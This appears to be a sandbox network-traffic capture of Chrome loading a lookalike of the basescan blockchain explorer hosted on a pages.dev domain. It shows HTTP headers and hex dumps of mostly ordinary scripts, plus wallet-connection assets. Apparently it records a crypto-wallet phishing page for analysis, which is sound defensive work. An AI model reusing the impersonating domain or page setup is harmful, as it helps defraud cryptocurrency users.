                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 2e 63 6f 6e 66 69 67 5b 6f 70 74 69 6f 6e 5d 3f 74 68 69 73 2e 63 6f 6e 66 69 67 5b 6f 70 74 69 6f 6e 5d 3a 6e 75 6c 6c 3b 7d 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 55 6e 66 6f 6c 64 53 69 6d 70 6c 65 28 65 6c 65 6d 65 6e 74 2c 63 6f 6e 66 69 67 29 7b 69 66 28 21 41 62 73 74 72 61 63 74 55 6e 66 6f 6c 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 6c 65 6d 65 6e 74 2c 63 6f 6e 66 69 67 29 29 72 65 74 75 72 6e 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 27 64 65 66 61 75 6c 74 53 74 61 74 65 27 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 61 72 67 65 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 75 6e 66 6f 6c 64 2d 2d 68 69 64 64 65 6e 27 29 3b 7d 7d
                                                                                                                                                                                                                                              Data Ascii: .config[option]?this.config[option]:null;};return true;}function UnfoldSimple(element,config){if(!AbstractUnfold.call(this,element,config))return;Object.defineProperty(this,'defaultState',{get:function(){return this.target.hasClass('u-unfold--hidden');}}
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 7b 74 68 69 73 2e 74 61 72 67 65 74 2e 6f 6e 28 27 77 65 62 6b 69 74 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 20 6d 6f 7a 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 20 4d 53 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 20 6f 61 6e 69 6d 61 74 69 6f 6e 65 6e 64 20 61 6e 69 6d 61 74 69 6f 6e 65 6e 64 27 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 73 65 6c 66 2e 74 61 72 67 65 74 2e 68 61 73 43 6c 61 73 73 28 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 75 6e 66 6f 6c 64 41 6e 69 6d 61 74 69 6f 6e 4f 75 74 29 29 7b 73 65 6c 66 2e 74 61 72 67 65 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 75 6e 66 6f 6c 64 41 6e 69 6d 61 74 69 6f 6e 4f 75 74 29 2e 61 64 64 43 6c 61 73 73 28 27 75 2d 75 6e 66 6f 6c 64 2d 2d 68 69 64 64 65 6e 27 29 3b 69 66 28 73 65 6c
                                                                                                                                                                                                                                              Data Ascii: {this.target.on('webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend',function(e){if(self.target.hasClass(self.config.unfoldAnimationOut)){self.target.removeClass(self.config.unfoldAnimationOut).addClass('u-unfold--hidden');if(sel
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC859INData Raw: 53 74 61 74 65 27 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 61 72 67 65 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 75 6e 66 6f 6c 64 2d 2d 68 69 64 64 65 6e 27 29 3b 7d 7d 29 3b 7d 0a 55 6e 66 6f 6c 64 4a 53 6c 69 64 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 65 6c 66 3d 74 68 69 73 3b 76 61 72 20 61 63 74 69 76 65 45 6c 73 3d 24 28 74 68 69 73 29 5b 30 5d 2e 63 6f 6e 66 69 67 2e 75 6e 66 6f 6c 64 54 61 72 67 65 74 3b 24 28 27 5b 64 61 74 61 2d 75 6e 66 6f 6c 64 2d 74 61 72 67 65 74 3d 22 27 2b 61 63 74 69 76 65 45 6c 73 2b 27 22 5d 27 29 2e 61 64 64 43 6c 61 73 73 28 27 61 63 74 69 76 65 27 29 3b 74 68 69 73 2e 73 6d 61 72 74 50 6f 73 69 74 69 6f 6e 28
                                                                                                                                                                                                                                              Data Ascii: State',{get:function(){return this.target.hasClass('u-unfold--hidden');}});}UnfoldJSlide.prototype.show=function(){var self=this;var activeEls=$(this)[0].config.unfoldTarget;$('[data-unfold-target="'+activeEls+'"]').addClass('active');this.smartPosition(


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              110192.168.2.549856104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC617OUTGET /assets/js/components/hs.malihu-scrollbar.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC871INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 1111
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=2197
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58863
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZ0r1Hub4EQlWCh81jdPVjRqGoi75POtOQPNqWtZ%2BM2NaxVyRijYnCvzGLfayZxZrrSgWqSdvmOitYul0SJ%2BNMIeFRM0MDyJKXxvIdEi03Jr5oDFBy9jqTuoRY9AzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e1382a195d-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC498INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 4d 61 6c 69 68 75 53 63 72 6f 6c 6c 42 61 72 3d 7b 5f 62 61 73 65 43 6f 6e 66 69 67 3a 7b 73 63 72 6f 6c 6c 49 6e 65 72 74 69 61 3a 31 35 30 2c 74 68 65 6d 65 3a 27 6d 69 6e 69 6d 61 6c 2d 64 61 72 6b 27 7d 2c 5f 70 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 3a 24 28 29 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 63 6f 6c 6c 65 63 74 69 6f 6e 2c 63 6f 6e 66 69 67 29 7b 69 66 28 21 63 6f 6c 6c 65 63 74 69 6f 6e 7c 7c 21 63 6f 6c 6c 65 63 74 69 6f 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 76 61 72 20 73 65 6c 66 3d 74 68 69 73 3b 63 6f 6e 66 69 67 3d 63 6f 6e 66 69 67 26 26 24 2e 69 73 50 6c 61 69 6e 4f 62 6a
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSMalihuScrollBar={_baseConfig:{scrollInertia:150,theme:'minimal-dark'},_pageCollection:$(),init:function(collection,config){if(!collection||!collection.length)return;var self=this;config=config&&$.isPlainObj
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC613INData Raw: 3d 24 74 68 69 73 2e 66 69 6e 64 28 27 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 27 29 3b 73 63 72 6f 6c 6c 42 61 72 54 68 75 6d 62 3d 24 74 68 69 73 2e 66 69 6e 64 28 27 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 27 29 3b 69 66 28 73 63 72 6f 6c 6c 42 61 72 2e 6c 65 6e 67 74 68 26 26 24 74 68 69 73 2e 64 61 74 61 28 27 73 63 72 6f 6c 6c 2d 63 6c 61 73 73 65 73 27 29 29 7b 73 63 72 6f 6c 6c 42 61 72 2e 61 64 64 43 6c 61 73 73 28 24 74 68 69 73 2e 64 61 74 61 28 27 73 63 72 6f 6c 6c 2d 63 6c 61 73 73 65 73 27 29 29 3b 7d 0a 69 66 28 73 63 72 6f 6c 6c 42 61 72 54 68 75 6d 62 2e 6c 65 6e 67 74 68 26 26 24 74 68 69 73 2e 64 61 74 61 28 27 73 63 72 6f 6c 6c 2d 74 68 75 6d 62 2d 63 6c 61 73 73 65 73 27 29 29 7b 73 63 72 6f 6c 6c 42 61 72 54 68
                                                                                                                                                                                                                                              Data Ascii: =$this.find('.mCSB_scrollTools');scrollBarThumb=$this.find('.mCSB_dragger_bar');if(scrollBar.length&&$this.data('scroll-classes')){scrollBar.addClass($this.data('scroll-classes'));}if(scrollBarThumb.length&&$this.data('scroll-thumb-classes')){scrollBarTh


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              111192.168.2.549853143.204.205.2134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC609OUTGET /up/script_asset/710c81a103.js HTTP/1.1
                                                                                                                                                                                                                                              Host: d107ul3j3wrui0.cloudfront.net
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC601INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                                                                                                              Content-Length: 53742
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Last-Modified: Thu, 29 Aug 2024 00:54:06 GMT
                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                              x-amz-version-id: bX7Vo4gHerG.FSCgheX8CS9DVi2X6fhb
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                                              Date: Fri, 27 Sep 2024 08:50:17 GMT
                                                                                                                                                                                                                                              ETag: "571aa9b070b19711c7687d069a134842"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                              Via: 1.1 1764af62d635a1a6ee51aabc37405452.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                              X-Amz-Cf-Pop: FRA53-C1
                                                                                                                                                                                                                                              X-Amz-Cf-Id: Eb_RkNbDNMfJ71o6TvwpHoYmIhXB1yIvqrnbv7u5v5Kt8VubVoPlFw==
                                                                                                                                                                                                                                              Age: 59151
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC16384INData Raw: 76 61 72 20 48 79 70 65 4c 61 62 3b 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 36 31 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 77 61 69 74 65 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 6e 7c 7c 28 6e 3d 50 72 6f 6d 69 73 65 29 29 28 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 74 72 79 7b 6c 28 69 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 73 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 6c 28 69 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 73 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 76 61
                                                                                                                                                                                                                                              Data Ascii: var HypeLab;(()=>{"use strict";var e={618:function(e,t,n){var i=this&&this.__awaiter||function(e,t,n,i){return new(n||(n=Promise))((function(o,s){function r(e){try{l(i.next(e))}catch(e){s(e)}}function a(e){try{l(i.throw(e))}catch(e){s(e)}}function l(e){va
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC10463INData Raw: 68 69 73 2e 69 63 6f 6e 29 3b 63 6f 6e 73 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 69 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 69 6e 66 6f 43 6f 6c 75 6d 6e 22 2c 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2c 74 68 69 73 2e 68 65 61 64 6c 69 6e 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 74 68 69 73 2e 68 65 61 64 6c 69 6e 65 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 68 65 61 64 6c 69 6e 65 22 2c 69 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 68 69 73 2e 68 65 61 64 6c 69 6e 65 29 2c 74 68 69 73 2e 64 69 73 70 6c 61 79 55 72 6c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 74 68 69 73 2e 64 69 73 70 6c 61
                                                                                                                                                                                                                                              Data Ascii: his.icon);const i=document.createElement("div");i.className="infoColumn",t.appendChild(i),this.headline=document.createElement("div"),this.headline.className="headline",i.appendChild(this.headline),this.displayUrl=document.createElement("div"),this.displa
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC16384INData Raw: 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 76 33 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 76 34 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 2e 64 65 66 61 75 6c 74 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 76 35 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                                                                                                                                                                                              Data Ascii: 0,get:function(){return i.default}}),Object.defineProperty(t,"v3",{enumerable:!0,get:function(){return o.default}}),Object.defineProperty(t,"v4",{enumerable:!0,get:function(){return s.default}}),Object.defineProperty(t,"v5",{enumerable:!0,get:function(){r
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC10511INData Raw: 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 69 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 68 69 73 2e 70 72 65 66 69 78 2b 22 2d 72 65 64 75 63 65 64 4d 6f 74 69 6f 6e 22 2c 74 68 69 73 2e 68 74 6d 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 3b 6c 65 74 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6f 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 68 69 73 2e 70 72 65 66 69 78 2b 22 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 22 2c 74 68 69 73 2e 68 74 6d 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2c 61 77 61 69 74 20 74 68 69 73 2e 77 61 69 74 28 35 30 29 3b 6c 65 74 20 73 3d 5b 65 2c 74 2c 6e 2c 69 2c 6f 5d 2e 6d 61 70 28 28 65 3d 3e 65 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 29 3b 72 65 74 75 72 6e 20 64 28
                                                                                                                                                                                                                                              Data Ascii: eElement("div");i.className=this.prefix+"-reducedMotion",this.html.appendChild(i);let o=document.createElement("div");o.className=this.prefix+"-transparency",this.html.appendChild(o),await this.wait(50);let s=[e,t,n,i,o].map((e=>e.clientHeight));return d(


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              112192.168.2.549857172.66.44.1714435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC515OUTGET /images/svg/brands/metamask.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC797INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0mU%2BTHWKMh5TeU51e8oYBwrfGYlhyw6dC6zePOyBBTMFjVX%2F7ab7I3RLro1uYwFcpBXZwI%2BvHT5Mzvn5Qk3VvquJj02jUI%2B9%2BIDD7NoTjWfCjTLhnUPKdKLJbn1y0YwXYkDpd9tOb9qh8C9eJaFfDgpUcgJc6KqGtl5EwmKvUMBqceIBVuGJHT2IInga9DyK7wxcuOi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e23e4dc345-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC572INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 38 34 30 30 31 33 66 64 38 63 32 61 62 32 33 34 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 33 2e 31 2e 32 2f 72 6f 6c 6c 75 70 73 2f 61 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72
                                                                                                                                                                                                                                              Data Ascii: " /> <link rel="stylesheet" href="840013fd8c2ab234.css" /> <link rel="stylesheet" href="styles.css" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> <script src="https://cdnjs.cloudflar
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 2f 31 39 39 39 2f 78 6c 69 6e 6b 26 23 33 39 3b 25 33 45 20 25 33 43 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 39 2e 33 20 28 35 31 31 36 37 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f 6d 2f 73 6b 65 74 63 68 20 2d 2d 25 33 45 20 25 33 43 74 69 74 6c 65 25 33 45 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 25 33 43 2f 74 69 74 6c 65 25 33 45 20 25 33 43 64 65 73 63 25 33 45 43 72 65 61 74 65 64 20 77 69 74 68 20 53 6b 65 74 63 68 2e 25 33 43 2f 64 65 73 63 25 33 45 20 25 33 43 64 65 66 73 25 33 45 25 33 43 2f 64 65 66 73 25 33 45 20 25 33 43 67 20 69 64 3d 26 23 33 39 3b 50 61 67 65 2d 31 26 23 33 39 3b 20 73 74 72 6f 6b 65 3d 26 23 33 39 3b 6e 6f 6e 65 26 23 33 39 3b 20 73 74 72 6f
                                                                                                                                                                                                                                              Data Ascii: /1999/xlink&#39;%3E %3C!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --%3E %3Ctitle%3EWalletConnect%3C/title%3E %3Cdesc%3ECreated with Sketch.%3C/desc%3E %3Cdefs%3E%3C/defs%3E %3Cg id=&#39;Page-1&#39; stroke=&#39;none&#39; stro
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 36 2e 32 31 34 33 38 39 20 31 34 38 2e 38 39 33 35 31 34 2c 31 32 36 2e 32 31 34 33 39 33 20 31 34 38 2e 38 39 33 35 31 2c 31 32 36 2e 32 31 34 33 39 36 20 4c 39 31 2e 35 34 30 35 38 38 38 2c 31 38 32 2e 33 36 38 39 32 37 20 43 38 39 2e 30 39 35 30 35 32 2c 31 38 34 2e 37 36 33 33 35 39 20 38 35 2e 31 33 30 30 31 33 33 2c 31 38 34 2e 37 36 33 33 39 39 20 38 32 2e 36 38 34 34 32 37 36 2c 31 38 32 2e 33 36 39 30 31 34 20 43 38 32 2e 36 38 34 34 31 33 33 2c 31 38 32 2e 33 36 39 20 38 32 2e 36 38 34 33 39 38 2c 31 38 32 2e 33 36 38 39 38 36 20 38 32 2e 36 38 34 33 38 32 37 2c 31 38 32 2e 33 36 38 39 37 20 4c 31 2e 38 37 31 39 36 33 32 37 2c 31 30 33 2e 32 34 36 37 38 35 20 43 2d 30 2e 35 37 33 35 39 36 39 33 39 2c 31 30 30 2e 38 35 32 33 37 37 20 2d 30 2e 35
                                                                                                                                                                                                                                              Data Ascii: 6.214389 148.893514,126.214393 148.89351,126.214396 L91.5405888,182.368927 C89.095052,184.763359 85.1300133,184.763399 82.6844276,182.369014 C82.6844133,182.369 82.684398,182.368986 82.6843827,182.36897 L1.87196327,103.246785 C-0.573596939,100.852377 -0.5
